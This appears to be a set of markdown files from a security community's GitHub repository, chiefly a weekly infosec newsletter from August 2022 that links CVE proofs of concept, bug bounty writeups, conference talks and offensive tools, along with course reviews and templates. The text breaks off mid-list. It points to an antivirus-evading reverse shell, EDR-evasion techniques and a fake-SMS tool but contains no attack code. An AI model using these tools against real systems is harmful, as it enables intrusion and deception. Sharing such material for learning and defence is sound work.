Let's Talk about [Internship/Job Opening in Aug 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md#Weekly-Cybersecurity-Hiring-Aug-2022).\n\n2. Here We have collected [Interview Questions asked by organization while Hiring](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/InterviewQA.md).\n\n3. Free SANS Workshop: [Building an Azure Pentest Lab for Red Teams](https://www.sans.org/webcasts/sans-workshop-building-azure-pentest-lab-red-teams/)\n\n### 📆📆📆 EVENTS, TALKS & WEBINAR 📆📆📆\n\n**This Week Defcon, BlackHat and Liran Tal talk from JSDayCAN22 was mainly trending in infosec community so We have filtered important Talk, Slides, Tools, Weekly Podcast, Youtube Videos and resources releted to Events, Talks & Webinars.**\n\n - In case you're still strugling with finding [Blackhat 2022 all the slides](https://drive.google.com/drive/mobile/folders/1KHx2rKUEdb53flGUN0mFHRdSdB5PUT4B?fbclid=IwAR1C2Fk3XDPU-ky-4B57ZmKtEKgjB6Yg-9m2c6MTxyJd779yPV7MCCHCvWo&fs=e&s=c). This drive have it all. Enjoy :)\n\n - In BlackHat USA 2022, markakd talked about [DirtyCred - A New Exploitation Method! No Pipe but as Nasty as Dirty Pipe](https://github.com/markakd/DirtyCred)\n\n - This article is the “text notes” version of @spaceraccoon talk at DEF CON 30 Cloud Village. [Exploiting Improper Validation of Amazon Simple Notification Service SigningCertUrl](https://spaceraccoon.dev/exploiting-improper-validation-amazon-simple-notification-service/) - The talk was not recorded so this is the only public version of it.\n\n - [How React Applications Get Hacked in the Real-World – Liran Tal](https://youtu.be/f16lELnFTNI) : [Slide](https://slides-react-security-lightning-talk-2022.vercel.app/1) -> By using React we are completely safe when it comes to sanitizing user input right? 
Liran scarily points out that in fact although React does cover most cases for us, dynamic href attributes are not encoded so can be susceptible to XSS attacks 😱. It’s therefore important that if we are to expose some user input via href we should always prefix the protocol (https://) and use relative paths!\n\n---\n\n### 🪲🪲🪲 CVE : poc exploit and cve analysis 🪲🪲🪲\n\n#### Week -> [23rd - 30th August 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md)\n\n**There are tens of thousands of vulnerabilities disclosed each year. Only a handful of them will ever be exploited So In this Section, Every Week we filter out  [CVE poc exploit and analysis writeups that have Higher Severity](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md).** If you don't play with CVE then please skip this Section.\n  \n      CVE POC exploit : CVE-2022-32250, CVE-2022-37042, CVE-2022-38766, CVE-2022-23779, CVE-2022-32250-Linux-Kernel-LPE, \n                        CVE-2022-22715 , CVE-2022-37153, CVE-2022-2884, CVE-2022-2586 and CVE-2022-LPE-UAF.\n      \n      CVE Analysis :    CVE-2022-20233, Multiple CVE in TENDA, CVE-2022-24787, CVE-2022-33318, CVE-2022-2884, CVE-2022-26377, \n                        CVE-2020-2733 and CVE-2022-30129. \n      \n### 🐞🐞🐞 BUG BOUNTY : report, vulnerability Writeups and resources 🐞🐞🐞\n\n   *1. In This Segment, We have filtered out **HACKERONE/BUGCROWD REPORT** for Bug Hunters :*\n    \n   -  [$4000 Pause-based desync in Apache HTTP Server 2.4.52 and earlier (CVE-2022-22720)](https://hackerone.com/reports/1667974) fails to close inbound connection when errors are encountered discarding the request body, exposing the server to HTTP Request Smuggling.\n   -  [Privilege Escalation - \"Analyst\" Role Can View Email Domains of a Company - [GET /voyager/api/voyagerOrganizationDashEmailDomainMappings]](https://hackerone.com/reports/1572591)\n \n  *2. 
In This Segment We Collect and filter out **BUG BOUNTY WRITEUPS, TIPS & RESOURCES:** *\n    \n   - [$4,000 Command Injection in the GitHub Pages Build Pipeline](https://blog.nietaanraken.nl/posts/github-pages-command-injection/)\n   - [Somdev Sangwan - Hacking ModSecurity  leads to WAF bypass, Code injection and RCE](https://s0md3v.github.io/blog/modsecurity-rce-bypass)\n   - [€1500 - Break the Logic: 5 Different Perspectives in Single Page](https://infosecwriteups.com/break-the-logic-5-different-perspectives-in-single-page-1500-5aa09da0fe7a)\n   - [rez0 reference for why IDORs with unpredictable IDs are valid vulnerabilities](https://rez0.blog/hacking/cybersecurity/2022/08/18/unpredictable-idors.html)\n   - [Bypassing Amazon WAF to pop an alert()](https://infosecwriteups.com/bypassing-amazon-waf-to-pop-an-alert-4646ce35554e)\n   - [Out-Of-Bond Remote code Execution(RCE) on De Nederlandsche Bank N.V. with burp-suite collaborator](https://infosecwriteups.com/out-of-bond-remote-code-execution-rce-on-de-nederlandsche-bank-n-v-with-burp-suite-collaborator-2ce50260e2e4)\n   - [a simple IDOR + Authorization vulnerability](https://monish-basaniwal.medium.com/the-million-dollar-hack-8163892bfe2f) to expose thousands of Visa gift cards on a leading gift card company’s website + Bonus: Found a way to redeem them more than once.\n   - [Bug Hunting Search Engine- A community curated resources for bug bounty hunting](https://bugbountyhunting.com)\n   \n\n### 🥇🥈🥉 OUR 6 FAVORITE FROM INFOSEC : article, whitepaper & statistics report 🥇🥈🥉\n  \n - [Google announces launching Google’s Open Source Software Vulnerability Rewards Program (OSS VRP) to reward discoveries of vulnerabilities in Google’s open source projects](https://security.googleblog.com/2023/08/Announcing-Googles-Open-Source-Software-Vulnerability-Rewards-Program%20.html?m=1). 
As the maintainer of major projects such as Golang, Angular, and Fuchsia, Google is among the largest contributors and users of open source in the world. With the addition of Google’s OSS VRP to our family of Vulnerability Reward Programs (VRPs), researchers can now be rewarded for finding bugs that could potentially impact the entire open source ecosystem.\n - [API vulnerabilities discovered and exploited in Q1-2022](https://drive.google.com/file/d/1MuOdfTDC6VRbNKnvHS1jYeOHfoEOi_Ci/view?usp=sharing)\n - [Twitter Whistleblower Document Archive](https://archive.org/download/whistleblower_disclosure)\n - [$100,000 Attacking the Mozilla Firefox Renderer : Browser bug, RCE (Part 2)](https://www.zerodayinitiative.com/blog/2022/8/23/but-you-told-me-you-were-safe-attacking-the-mozilla-firefox-renderer-part-2)\n - [Cujanovic : SSRF (Server Side Request Forgery) testing resources](https://github.com/cujanovic/SSRF-Testing)\n - [Eavesdropping: €8,000,000 does it cost to buy Predator spyware ?](https://www.secnews.gr/417192/ipoklopes-agora-predator-spyware/)\n---\n### 🐦🐦🐦 TWITTER THREAD & TIPS 🐦🐦🐦\n \n  - [Detectify shared a thread for Latest CVE submission on their Attack surface platform](https://twitter.com/detectify/status/1564285800086380545?t=V8lXKxykl1rrRZ0gNwBv_A&s=19).\n  - [Rapid Api shared a thread on what exactly is CORS?](https://twitter.com/Rapid_API/status/1564621466620018690?t=5acaUewayJaLGyG_7R8fPw&s=19)\n  - [Backdoor password in a ZIP!](https://twitter.com/_mohemiv/status/1561044393880178689) \n             \n             🔴If you create a compressed file with the following command: 7z a x.zip 1.png -mem=AES256 -p\n              Next, enter the following password (the password will not be shown):\n              Nev1r-G0nna-G2ve-Y8u-Up-N5v1r-G1nna-Let-Y4u-D1wn-N8v4r-G5nna-D0sert-You\n\n              Now decompress the file with the following command and password:\n              7z e x.zip\n\n              and the following password:\n              
pkH8a0AqNbHcdw8GrmSp\n ---\n\n### 🔍🔍🔍 RESEARCHERS, SECURITY & IT ORGANIZATION 🔍🔍🔍\n\n  **This is one of the best segments if you are a researcher and want to explore security, new approaches to finding vulnerabilities and the infosec business in depth.** If you're a beginner bug hunter or junior pentester, you can skip this section.\n  \n - **1 - Web Security, cloud misconfiguration and android security**\n   - [API test environment](https://www.getsecureworld.com/blog/what-are-the-api-pentest-requirements/) This interesting article lists the questions to ask before performing an API pentest.\n   \n   - In this article, what at first appeared to be minor “password issues” led to a high-risk attack path enabling NodeZero to [access the domain admin accounts, and even break into the organization’s Azure cloud environment](https://www.horizon3.ai/how-nodezero-found-access-to-azure-environment/).\n   \n   - [Misconfigured Resource-Based Policies - Hacking The Cloud](https://hackingthe.cloud/aws/exploitation/misconfigured_resource-based_policies/)\n   \n   - [Android security checklist - Theft of arbitrary files](https://blog.oversecured.com/Android-security-checklist-theft-of-arbitrary-files/)\n  \n   - [cezary-sec/awesome-browser-security](https://github.com/cezary-sec/awesome-browser-security/) \nA curated list of awesome browser security learning material by Opera’s Cezary Cerekwicki. 
Covers good intro material, security challenges and corresponding mitigations, attacks on browsers, and more.\n\n   - [CSRF vulnerability in the popular NodeJS third-party csurf package](https://fortbridge.co.uk/research/a-csrf-vulnerability-in-the-popular-csurf-package/)\n  \n   - [Chaining Telegram bugs to steal session-related files](https://dphoeniixx.medium.com/chaining-telegram-bugs-to-steal-session-related-files-c90eac4749bd)\n   \n- **2 - Blue/Red/Purple/Threat hunting Team**\n   - [Threat Hunting Tools: Our Recommendations](https://socprime.com/blog/threat-hunting-tools-our-recommendations/)\n   \n   - [Endpoint Security: Intuition around the Mudge Disclosures](https://medium.com/starting-up-security/endpoint-security-intuition-around-the-mudge-disclosures-dfbe014790f2) \nGreat post by Ryan McGeehan on the core things you should keep in mind about endpoint security, communicating with senior management, risk scenarios, measuring progress, practical realities, and more.\n   \n   - [BlueHound: Community Driven Resilience](https://zeronetworks.com/blog/bluehound-community-driven-resilience/)\nZero Networks’ Dekel Paz describes BlueHound, a tool that helps blue teams pinpoint the security issues that actually matter. By combining information about user permissions, network access and unpatched vulnerabilities, BlueHound reveals the paths attackers would take if they were inside your network.\n   \n   - [Hunting for emerging Sliver command-and-control (C2) frameworks](https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/)\n   \n   - [Guide to DLL Sideloading](https://crypt0ace.github.io/posts/DLL-Sideloading/) \nDLL Sideloading is a technique related to DLL Hijacking.\n\n   - [Hacking WatchGuard firewalls with vulnerability XPath injection, Memory corruption bug, Local Privilege Escalation and RCE](https://www.ambionics.io/blog/hacking-watchguard-firewalls). 
This article goes into depth on how Ambionics Security discovered 5 vulnerabilities - 2 patched along the way - built 8 distinct exploits, and finally obtained an unpatched pre-authentication remote root 0-day on every WatchGuard Firebox/XTM appliance.\n \n   - [How Hackers Exploit Exposed Default Welcome Page](https://blog.criminalip.io/2022/08/24/default-welcome-page-exposure/) By searching with the common keywords of default welcome pages, one can easily find exposed default welcome pages on the open web.\n \n  - [Investigating .NET CLR Usage Log Tampering Techniques For EDR Evasion (Part 2)](https://bohops.com/2022/08/22/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion-part-2/)\n\n  - [On Cryptocurrency Wallet Design – defines access control taxonomy, can be reused e.g. for MFA factors](https://eprint.iacr.org/2021/1522.pdf)\n \n - **4 - Infosec Business** \n\n   - In this article, Haider Mahmood talked about [Information Security Checklist for Small to Medium Organizations](https://haiderm.com/information-security-checklist-for-small-to-medium-organizations/)\n\n   - In this article the author (nozaq) shared his experience in detail in [The to-do list for terminating a payment service](https://engineering.mercari.com/en/blog/entry/20201219-6e7ea87db8/)\n\n   - In this article, [Godric Cao shares his experience when it comes to organizational design](https://engineering.mercari.com/en/blog/entry/20211225-size-backend-team-to-5-to-8-members/) and factors such as the company’s current phase, the effect of team size adjustments on team performance, organization and individual growth paths, etc. 
\n\n---\n\n### 📰📰📰 NEWS 📰📰📰\n\n- **Leaks & BlackHat Hacker:**\n  \n   - [🟢Data-Leak:LastPass hacked and stolen source code, blueprints of company by intruder](https://www.theregister.com/2022/08/25/lastpass_security/) 🔴Hacking was done by hacking the account of a developer and through that hackers were able to penetrate the development environment inside the company.\n   - [🟢Explained: The General Bytes Bitcoin ATM Hack (August 2022)](https://halborn.com/explained-the-general-bytes-bitcoin-atm-hack-august-2022/)\n   - [🟢ÆPIC Leak: Architecturally Leaking Uninitialized Data from the Microarchitecture](https://drive.google.com/file/d/19qUBeq7jGaxP1kWBGaH1XPA6ZbsCpisAG/view?usp=sharing)\n\n- **Top 5 Infosec News:**\n   - [🟢 80,000 Hikvision cameras vulnerable with CVE-2021-36260](https://www.bleepingcomputer.com/news/security/over-80-000-exploitable-hikvision-cameras-exposed-online/) 🔴If you operate a Hikvision camera, you should make it a priority to install the latest available firmware update, use a strong password, and isolate the IoT network from critical assets using a firewall or VLAN.\n   - [🟢 Ex-Twitter exec blows the whistle, alleging reckless and negligent cybersecurity policies](https://edition.cnn.com/2022/08/23/tech/twitter-whistleblower-peiter-zatko-security/index.html)🔴One of Twitter's former security chiefs named Peiter \"Mudge\" Zatko has revealed in disclosure about the security and privacy of this platform that include Twitter has major security problems that pose a threat to the personal information of its users, company shareholders, national security, and democracy.\n  - [🟢Google Uncovers Tool Used by Iranian Hackers to Steal Data from Email Accounts](https://thehackernews.com/2022/08/google-uncovers-tool-used-by-iranian.html?fbclid=IwAR34LikXAB8_osmMVauu0jAZuDRPbGKkfQRG-fcc2lWnOXZLjO49y3kqmws)\n  - [🟢NATO investigating hacker sale of missile firm data](https://www.bbc.co.uk/news/technology-62672184). 
🔴NATO says it's assessing the impact of a breach of classified military documents being sold by a hacker group online, but the source of the documents is murky.\n  - [🟢DuckDuckGo opens its privacy-focused email service to everyone](https://www.bleepingcomputer.com/news/security/duckduckgo-opens-its-privacy-focused-email-service-to-everyone/).\n---\n\n### 🛠️🛠️🛠️ TOOLS 🛠️🛠️🛠️ \n\n*The community tests the tools and we filter out the most in-demand and helpful tools that suit the hacker's purpose.*\n\n - **1. SAAS/PASS/Recon/Network/Web Pentesting** - 8\n    \n    - [JWT-Reauth - a Burp plugin that aims to provide a painless solution to re-authentication](https://research.nccgroup.com/2022/08/25/tool-release-jwt-reauth/). JWT-Reauth provides Burp with a way to authenticate with a given endpoint, parse out the provided token and then attach it as a header on requests going to a given scope. \n    \n    - [tfsec](https://github.com/aquasecurity/tfsec) -> This community-driven tool gained popularity for using static analysis of your Terraform code to spot potential misconfigurations across all major cloud providers.\n  \n    - [hahwul/WebHackersWeapons](https://github.com/hahwul/WebHackersWeapons) -> By Hahwul: A collection of cool tools used by web hackers, grouped by tag and language. Types: Swiss Army Knife, recon, fuzzer, scanner, exploit, utils, etc.\n    \n    - [Vision2 - Nmap's XML result parse and NVD's CPE correlation to search CVE](https://github.com/CoolerVoid/Vision2)\n    \n    - [Rekono](https://github.com/pablosnt/rekono) -> This tool gained popularity for combining other hacking tools and their results to execute complete pentesting processes against a target in an automated way. The findings obtained during the executions are sent to the user via email or Telegram notifications and can also be imported into Defect-Dojo if advanced vulnerability management is needed. 
\n    \n    - [Jscythe](https://github.com/evilsocket/jscythe) -> Abuses the node.js inspector mechanism in order to force any node.js/electron/v8 based process to execute arbitrary JavaScript code. \n       \n    - [EtwSessionHijacking](https://github.com/ORCx41/EtwSessionHijacking) -> A PoC on blocking Procmon from monitoring network events.\n      \n    - [ExchangeFinder](https://github.com/mhaskar/ExchangeFinder) -> Find Microsoft Exchange instances for a given domain and identify the exact version.\n      \n - **2. Cloud Security** - 1\n \n     - [How to detect suspicious activity in your AWS account by using private decoy resources](https://aws.amazon.com/blogs/security/how-to-detect-suspicious-activity-in-your-aws-account-by-using-private-decoy-resources/) -> AWS’s Maitreya Ranganath and Mark Keating describe how you can create low-cost private decoy AWS resources in your AWS accounts and configure them to generate alerts when they are accessed. See also the awesome [canarytokens.org](https://canarytokens.org/generate)\n \n - **3. Blue/Red Team, IR and Threat intelligence Tools** - 4\n     \n     - [RedCloud - Comfy & powerful #RedTeam Infrastructure deployment using #Docker](https://github.com/khast3x/Redcloud) -> It has gained popularity in the red team community because it harnesses the cloud's speed for your tools (Metasploit, Empire, GoPhish, vulnerable targets, a fully stacked Kali, and many more). Deploys in minutes. Use and manage it with its polished web interface.\n     \n     - [Deobfuscate Log4Shell payloads with ease](https://github.com/ox-eye/Ox4Shell) -> Since the release of Log4Shell, many tools were created to obfuscate Log4Shell payloads. 
This blue-team tool by Oxeye lets you unravel the true contents of obfuscated Log4Shell payloads with ease.\n     \n     - [hoaxshell](https://github.com/t3l3machus/hoaxshell) -> An unconventional Windows reverse shell, currently undetected by Microsoft Defender and various other AV solutions, solely based on http(s) traffic. \n     \n     - [Yarang - YARA New Generation](https://github.com/avast/yarang) -> yarang is an experiment focused on a new scanning engine for YARA, based on compiling the YARA ruleset into native code and exposing a C API in order to use it anywhere. It uses Hyperscan under the hood as the pattern matcher instead of the custom Aho-Corasick implementation that YARA rolls.\n  \n - **4. OSINT Tools** - 3\n     \n     - [Geogramint](https://github.com/Alb-310/Geogramint) -> An OSINT geolocalization tool for Telegram that finds nearby users and groups.\n     \n     - [Moriarty-Project](https://github.com/AzizKpln/Moriarty-Project) -> This tool gives information about the phone number that you entered.\n     \n     - [fake-sms](https://github.com/machine1337/fake-sms) -> Features that make this tool interesting include anonymous SMS sending, easy and super fast sending, international SMS support and no charges for sending, with one limitation: you can send only one SMS per day.\n  \n  - **5. IoT, OS & Hardware** - 2 \n      \n      - [Titan M tools](https://github.com/quarkslab/titanm) -> Attack on Google Titan M, Reloaded: Vulnerability Research on a Modern Security Chip\n      \n      - [Tangled WinExec](https://github.com/daem0nc0re/TangledWinExec) -> This repository is for investigation of Windows process execution techniques. Most PoCs are given a name corresponding to the technique.\n\n---\n \n### 🤝🤝🤝 How to get involved in contributing. 
#Contact-Us 🤝🤝🤝\n\n<div align=\"\"><br>\n <a href=\"mailto:resethackerofficail@gmail.com?subject=ResetHacker Community\" target=\"_blank\"><img src=\"https://img.shields.io/badge/Gmail-D14836?logo=gmail\"></a>\n</div>\n\n    If you want to quickly get involved in making **Weekly Cybersecurity Update** better, but aren't sure how,\n    CONTACT \"@Attr1b\" on Telegram or mail us at \"resethackerofficial@gmail.com\" \n    \n    Please write a reason: how do you plan to improve it?\n    \n### I'm so grateful to all the [organizations and researchers](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md); without their writeups, articles, findings and whitepapers [Weekly infosec Update](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) would not have been possible.\n\n### I'm very grateful to all the [organizations, groups, and communities that support us with engagement](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/CommunityEngagementSupport.md). Without their support, getting \"Weekly InfoSec Update\" to hackers would not have been possible.\n\n### Wrapping Up\n\n  Have questions, suggestions, or feedback? Just reply directly to this mail; I'd love to hear from you.\n\n  If you find this update useful and know other people who would too, I'd really appreciate it if you'd forward it to them 🙏\n\n  Thanks for reading!\n"
  },
  {
    "path": "ResetCybersecuirty/WIUAsset/WIU_Templete/WIU_v0.4.md",
    "content": "### This week we have made some changes in New version of \"Weekly Security Update\" v0.4\n\n1. Added nevigation Bar (called SAVE TIME).\nSo hacker can select the segment and read it without hussle with scrolling.\n\n2. We have Reduce segment from 12  to 7.\nAnd my apology for So much Info. We're finding a way to make it shorter and more user friendly.\n\n---\n\n**Tips to SAVE TIME and How to READ ? **\n- Select the topic from the navbar bellow and click on PRIVIEW to read.:\n\n[![event](https://img.shields.io/badge/-Event-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-event) [![cve poc](https://img.shields.io/badge/-CVE-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-cve) [![bug bounty](https://img.shields.io/badge/-Bug%20Bounty-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-bb) [![research & Business](https://img.shields.io/badge/-Research-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-research) [![news](https://img.shields.io/badge/-News-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-news) [![hiring](https://img.shields.io/badge/-Hiring-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-hiring) [![tools](https://img.shields.io/badge/-Tools-%23ffff33?style=for-the-badge&logo=github&logoColor=black)](#title-tools)\n\n![WIU Agenda Every Wednesday @ 8 AM IST](https://user-images.githubusercontent.com/25515871/189009272-a1a0ecf8-d939-4792-bf0d-53eb9f1c6638.jpg)\n\n\n\n<details>\n <summary><b>Priview</b></summary>\n\n</details>\n"
  },
  {
    "path": "ResetCybersecuirty/WIUAsset/WIU_Templete/helpdesk-Github.md",
    "content": "<h3 align=\"center\">GitHub HelpDesk and Documentation</h3>\n\n<h3 align=\"center\">Want to contribute to this project?</h3>\n<h2 align=\"center\"> 📌 Tech Stack </h2>\n\n\n#### [Documentation](https://docs.github.com/en/get-started/writing-on-github/getting-started-with-writing-and-formatting-on-github/basic-writing-and-formatting-syntax) \n**1.** Documentation Status:\n\n[For link]()\n\n**1.** [![Documentation Status](https://readthedocs.org/projects/resethacker-community/badge/?version=latest)](https://resethacker-community.readthedocs.io/en/latest/?badge=latest)\n\n- Sign up with https://readthedocs.org\n\n**2.** [To generate an image of contributors to keep your README.md in sync.](https://contrib.rocks/preview?repo=angular%2Fangular-ja) \n\n- Visit https://contrib.rocks and enter the repository.\n\n---\n\n#### NavBar\n[![WhatsApp](https://img.shields.io/badge/WhatsApp-25D366?style=for-the-badge&logo=whatsapp&logoColor=white)](https://wa.me/%2B919xxxxxxxx?text=Hello%2C%20I%20am%20here%20from%20the%20'ResetHackers%2Fcommunity'%20GitHub%20Repository.%20)\n[![Discord](https://img.shields.io/badge/Discord-7289DA?style=for-the-badge&logo=discord&logoColor=white)](https://discord.gg/xxxxxxx)\n\n--\n# Use case\n## Use case\n### Use case\n#### Use case\n- This is Test1\n> This is Test2.\n\n-\n\n`git status`\n\n``` This is \n    test3\n  ``` \n  \n  ``` This is \n    test3\n    # or\n    test4\n  ``` \n-\n\n1. First list item\n   - First nested list item\n     - Second nested list item\n\n# Task List\n- [x] #739\n- [ ] https://github.com/octo-org/octo-repo/issues/740\n- [ ] Add delight to the experience when all tasks are complete :tada:\n\n![Styling Text Github](https://user-images.githubusercontent.com/25515871/195506052-b6cc8de0-159f-4701-bfa5-b40376355bcb.png)\n\n\n@github/support What do you think about these updates?\n\n\nHere is a simple footnote[^1].\n\nA footnote can also have multiple lines[^2].\n\nYou can also use words, to fit your writing style more closely[^note].\n\n[^1]: My reference.\n[^2]: Every new line should be prefixed with 2 spaces.  \n  This allows you to have a footnote with multiple lines.\n[^note]:\n    Named footnotes will still render with numbers instead of the text but allow easier identification and linking.  \n    This footnote also has been made with a different syntax using 4 spaces for new lines.\n    \n    \n### Hiding content with comments    \n\n<!-- This content will not appear in the rendered Markdown -->\n\n"
  },
  {
    "path": "ResetCybersecuirty/WIUAsset/Weekly_Infosec_Update_Segment/Course_Review/CEH.md",
    "content": "ResetHacker Community : Course Reviews\n\nDISCLAIMER: These are ResetHacker members' personal opinions and feelings! Make your own judgment. \n\n| Domain | Course Title | Author | Year | Level | Exam : Theory/Practical | Validity | Industry Demand |\n|---|---|---|---|---|---|---|---|\n| Ethical Hacking : Theory/Practical | CEH v11 | EC-Council | 2022 | Intro/beginner | Yes, Both | 2 years | High |\n\n\n\nIntro : \n      \n      This was my first course in 2019. This was the \"intro/beginner\" course (Certified Ethical Hacking with a theory-based exam). \n      I took it after attending a webinar about Ethical Hacking. If I have to recall, it was quite understandable since \n      I was attending offline classes twice a week and my teacher was really good for a beginner course.\n      \nYour opinion on why would anyone take this course?\n\n      The course provides you with login credentials to the ASPEN portal (the entire course resources are available online), 3 Ebooks that include 2 for theory and 1 lab manual, an exam voucher, \n      a PDF (high quality, only for you), and video lectures (average).\n      For me the labs were at the right level of difficulty, but I personally think if you're getting started and don't have any background in cybersecurity\n      then you should go for it. Many organizations consider the Certified Ethical Hacker certification to be a minimum requirement \n      when looking to appoint someone for a cyber security role. This certification may be exactly what you need to get the recruiter’s attention.\n     \nExam : \n\n      For the CEH exam they give you both options, Theory/Practical, so better consult your training institute for this.\n      For the theory-based exam, you will have no choice but to just memorize – I hated this about the course, but it is easy to crack the exam.\n\nExam voucher: \n      \n      I think that you have an option to purchase this with your training voucher. \n      Please keep in mind that the voucher is valid for 12 months. The exam must be taken at a certified exam center.\n     \nDislike, Suggestion and opinion on Course/Assignments/Labs/Project and level of difficulty. \n\n      This course needs to add a project to the course so later we can add it to our resume. Labs are good, but I recommend users \n      to set up a lab at a very early stage with help of the manual, YouTube or blogs; don't depend on your instructor. \n     \nFinal Note:\n\n      In case you want to advance your Pentesting career:\n      Offensive Security Certified Professional (OSCP), EC-Council Certified Security Analyst (ECSA), Licensed Penetration Tester (LPT), etc. will be the next.\n\nRahul Kumar : Team ResetHacker\n"
  },
  {
    "path": "ResetCybersecuirty/WIUAsset/Weekly_Infosec_Update_Segment/Course_Review/Readme.md",
    "content": "ResetHacker Community : Course Reviews\n\nDISCLAIMER: These are ResetHacker members' personal opinions and feelings! Make your own judgment. \n\n| Domain | Course Title | Author | Year | Level | Exam : Theory/Practical | Validity | Industry Demand |\n|---|---|---|---|---|---|---|---|\n| Ethical Hacking : Theory/Practical | CEH v11 | EC-Council | 2022 | Intro/beginner | Yes, Both | 2 years | High |\n| |  |  |  |  |  |  |  |\n|  |  |  |  |  |  |  |  |\n\n**Keep in mind while writing the reviews**\n        \n        Is/was it your 1st course?\n        Course Level : \"intro/beginner\", intermediate and advanced.\n        Course Mode : Offline/Online\n        Your opinion on why would anyone take this course and level of difficulty. \n        Dislike, suggestion and opinion on Course/Assignments/Labs/Project.\n        Your opinion on the instructor. (Optional)\n        Exam & Exam voucher.\n        Certified Ethical Hacker internship/jobs perspective\n        Final Note/Conclusion\n\n        1st Contributor name : XYZ1\n        2nd Contributor name : XYZ2 (If any)\n        ......\n        Last Updated on Date/Month/Year, Time.\n        \n        \n Eg : \n \n Intro :     \n      This was my first course in 2019. This was the \"intro/beginner\" course (Certified Ethical Hacking with a theory-based exam). \n      I took it after attending a webinar about Ethical Hacking. If I have to recall, it was quite understandable since \n      I was attending offline classes twice a week and my teacher was really good for a beginner course.\n      \nYour opinion on why would anyone take this course?\n\n      The course provides you with login credentials to the ASPEN portal (the entire course resources are available online), 3 Ebooks that include 2 for theory \n      and 1 lab manual, an exam voucher, a PDF (high quality, only for you), and video lectures (average).\n      For me the labs were at the right level of difficulty, but I personally think if you're getting started and don't have any background in cybersecurity\n      then you should go for it. \n      Many organizations consider the Certified Ethical Hacker certification to be a minimum requirement when looking to appoint someone for a cyber security role.\n      This certification may be exactly what you need to get the recruiter’s attention.\n     \nExam : \n\n      For the CEH exam they give you both options, Theory/Practical, so better consult your training institute for this.\n      For the theory-based exam, you will have no choice but to just memorize – I hated this about the course, but it is easy to crack the exam.\n\nExam voucher: \n      \n      I think that you have an option to purchase this with your training voucher. \n      Please keep in mind that the voucher is valid for 12 months. The exam must be taken at a certified exam center.\n     \nDislike, Suggestion and opinion on Course/Assignments/Labs/Project and level of difficulty. \n\n      This course needs to add a project to the course so learners can add it to their resume. Labs are good, but I personally recommend learners\n      to learn how to set up a lab at a very early stage with help of YouTube or blogs etc., and not depend on the CEH instructor. \n     \nFinal Note:\n\n      In case you want to advance your Pentesting career :\n      Offensive Security Certified Professional (OSCP), EC-Council Certified Security Analyst (ECSA), Licensed Penetration Tester (LPT), etc. will be the next.\n\nRahul Kumar : Team ResetHacker\n"
  },
  {
    "path": "ResetCybersecuirty/WIUAsset/Weekly_Infosec_Update_Segment/Future_updates.md",
    "content": "# Community Requirements, Suggestions and Feedback :\n\n- Newsletter in TLDR format.\n- Move to a website.\n\n## Bugbounty\n- Parameters to add to your wordlist, for example: example[.]com/path/SSRF-PAYLOAD/\n- Latest bug bounty programs listed on HackerOne/Bugcrowd.\n- Case studies of vulnerabilities based on HackerOne/Bugcrowd/Intigriti reports and writeups.\n  \n    Example for Case Study:\n      - Case study methodology\n      - What functionalities are vulnerable to SSRFs?\n      - Vulnerable parameters\n      - Which payloads actually work?\n      - How are people showing the impact of SSRFs?\n      - Conclusions - how to look for SSRFs today?\n      - The database with 315 reports\n"
  },
  {
    "path": "ResetCybersecuirty/WIUAsset/Weekly_Infosec_Update_Segment/Readme.md",
    "content": "\n"
  },
  {
    "path": "ResetCybersecuirty/WIUAsset/Weekly_Infosec_Update_Segment/Tools/Readme.md",
    "content": "## Weekly Cybersecurity 01 : v0.2\n**Date : 2nd - 23rd Aug 2022**\n\n\n\n### Projects, Tools, RATs and Ransomware\n*Misc Tools :*\n- List of Black Hat Arsenal tools (since its inception in 2011) - https://github.com/toolswatch/blackhat-arsenal-tools\n\n*OSINT Tools :*\n- [Yagooglesearch (Yet Another Google Search, #python library) : \"Simulates real human Google search behavior to prevent rate limiting by Google, and handles being blocked by Google with HTTP 429\"](https://github.com/opsdisk/yagooglesearch)\n- Quick manual for Yagooglesearch - https://graph.org/Yagooglesearch-08-17\n- [PyTrends : Simple #python library for automatically collecting data from Google Trends. For example, you can find out what queries users enter with a certain keyword (including historical and regional data)](https://github.com/GeneralMills/pytrends)\n- [Email-header-analyzer](https://github.com/cyberdefenders/email-header-analyzer)\n- [Search Patterns - tool that analyzes autosuggest for #Google and #YouTube search queries (questions, prepositions, comparisons, and words starting with different letters of the alphabet). The data can be viewed as a graph or list.](https://chrome.google.com/webstore/detail/search-patterns/hjlahhonnlceifaecpjejlhhgjkipnbj/related?hl=zh-CN&gl=001)\n\n*SaaS/PaaS/Recon/VA/Pentesting/Exploit Web :*\n- [Pentesting Reporting Tool](https://reconshell.com/pentesting-reporting-tool/)\n- [Lazyparam - A simple automation tool to detect LFI, RCE, and SSTI vulnerabilities](https://github.com/aniqfakhrul/lazyParam)\n- [FindFrontableDomains : Search for potential frontable domains. Based on information found here: https://www.bamsoftware.com/papers/fronting/](https://github.com/rvrsh3ll/FindFrontableDomains)\n- [goSqlite_gorm - golang, Penetration, Attack, Auxiliary Tool, tnb = tree new bee](https://github.com/hktalent/goSqlite_gorm)\n- [Serein_Linux - 【Lazy Artifact】A graphical tool that collects URLs in batches and runs various n-day checks against the collected URLs in batches. It can be used for SRC mining, CNVD mining, 0-day exploitation, building your own arsenal and other 